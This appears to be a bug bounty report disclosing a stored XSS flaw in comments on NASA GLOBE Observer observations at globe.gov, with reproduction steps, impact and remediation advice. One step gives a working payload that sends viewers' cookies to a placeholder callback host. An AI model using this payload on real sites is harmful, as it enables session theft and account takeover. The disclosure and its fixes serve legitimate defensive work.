Summary by GKData
NASA GLOBE Observer Mobile App / Web - Stored XSS Vulnerability
Affected Endpoint
https://www.globe.gov/web/
Affected Feature
Observation Comments (Publicly Shared)
Summary
A stored XSS vulnerability was discovered in the comment field of shared observations within the NASA GLOBE Observer mobile app. By injecting HTML/JavaScript into the comment, I was able to execute JavaScript in the browser context of any user viewing the observation. The payload executed automatically on page load and was rendered, unencoded, on the public/shared observation pages, so it persists for every viewer rather than being tied to a single crafted request.
Because the script runs in the globe.gov origin, it can exfiltrate any cookies readable from script to an external server and can issue requests on the victim's behalf, which allows session hijacking and account compromise.
Steps to Reproduce
- Install the NASA GLOBE Observer mobile app.
- Create or select any observation. I chose a tree measurement and submitted random photos from the Observer app on the latest iOS; observations submitted this way are rendered on the web version, where they can be viewed globally.
- In the "comment" field, enter the following payload:
  <img src=x onerror="new Image().src='https://CALLBACKURLHERE?cb='+encodeURIComponent(document.cookie)">
- Submit the observation.
- Visit the observation's public/shareable URL (e.g. https://www.globe.gov/web/lightrip/...) from any other account or from an incognito session.
- Upon loading the page, the script:
  - executes automatically,
  - sends the viewing user's cookies (everything exposed through document.cookie) to the attacker's server, and
  - demonstrates a persistent stored XSS that fires for every user who views the observation.
Impact
- Stored XSS affecting every user who views the observation, with no interaction beyond opening the page
- Session hijacking via stolen cookies; this requires the session cookie to be readable from script (no HttpOnly flag), and even where HttpOnly is set the payload can still make authenticated requests inside the victim's session
- Arbitrary JavaScript execution in the sessions of NASA GLOBE users
- Persistent across shared/public observation URLs for as long as the observation exists
- Could be chained for full account takeover, or for privilege escalation if a privileged user views the observation
Suggested Fix
- Treat the comment field as plain text: reject or strip HTML tags and event-handler attributes on input, and validate length and character set
- HTML-encode all user-generated content at the point of output, in the context in which it is rendered (text node, attribute, URL), on the server side; this is the primary control, since any client that receives the raw string can render it unsafely
- If rich text must be supported, run a maintained sanitizer such as DOMPurify with an explicit allow-list; client-side sanitization alone does not protect other clients or API consumers
- Deploy a Content-Security-Policy without 'unsafe-inline' in script-src (use nonces or hashes for legitimate scripts) so that inline handlers such as onerror are refused even if an encoding bug slips through; restricting img-src and connect-src to trusted origins also blocks the cookie beacon used in the proof of concept
- Mark session cookies HttpOnly, Secure and SameSite so that a future script-injection bug cannot read them directly